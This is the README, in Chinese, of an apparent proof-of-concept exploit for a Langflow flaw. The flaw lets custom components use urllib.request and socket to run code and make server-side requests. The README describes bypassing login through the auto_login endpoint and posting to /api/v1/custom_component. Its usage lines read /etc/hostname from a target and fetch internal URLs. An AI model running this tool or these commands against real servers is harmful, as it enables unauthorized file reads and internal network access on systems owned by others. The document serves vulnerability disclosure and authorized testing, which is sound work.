Langflow OSS (≤ 1.10.0) — 该漏洞允许通过自定义组件中的 urllib.request / socket 执行任意代码。
组件扫描器的拒绝列表遗漏了这些标准库模块。已在 1.10.1 中修复(IBM)。
严重性:PR:L(可公开复现 / 低严重性)
利用端点:POST /api/v1/custom_component
需要会话 cookie 或 bearer token。
--test — 无需认证。仅执行公开的 GET /api/v1/version。--read / --fetch — 首先进行认证:
GET /api/v1/auto_login。如果 JSON 响应包含 access_token,则发送 Authorization: Bearer …(无需用户名/密码)。--uname / --password 以 application/x-www-form-urlencoded 格式执行 POST /api/v1/login。POST /api/v1/custom_component。--uname / --password 仅在自动登录被禁用时使用。在默认原版安装中,它们会被忽略。
仅限授权测试。 请勿对您不拥有或未获得明确测试许可的系统使用此工具。
要求:Python 3(仅标准库)。
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --test
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --read /etc/hostname
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --fetch http://127.0.0.1:7860/api/v1/version
python3 cve-2026-12944-langflow-urllib-ssrf.py -u https://TARGET --read /etc/hostname --insecure
python3 cve-2026-12944-langflow-urllib-ssrf.py -u TARGET --uname langflow --password langflow --read /etc/hostname
报告与 PoC:ShadowForge Cyber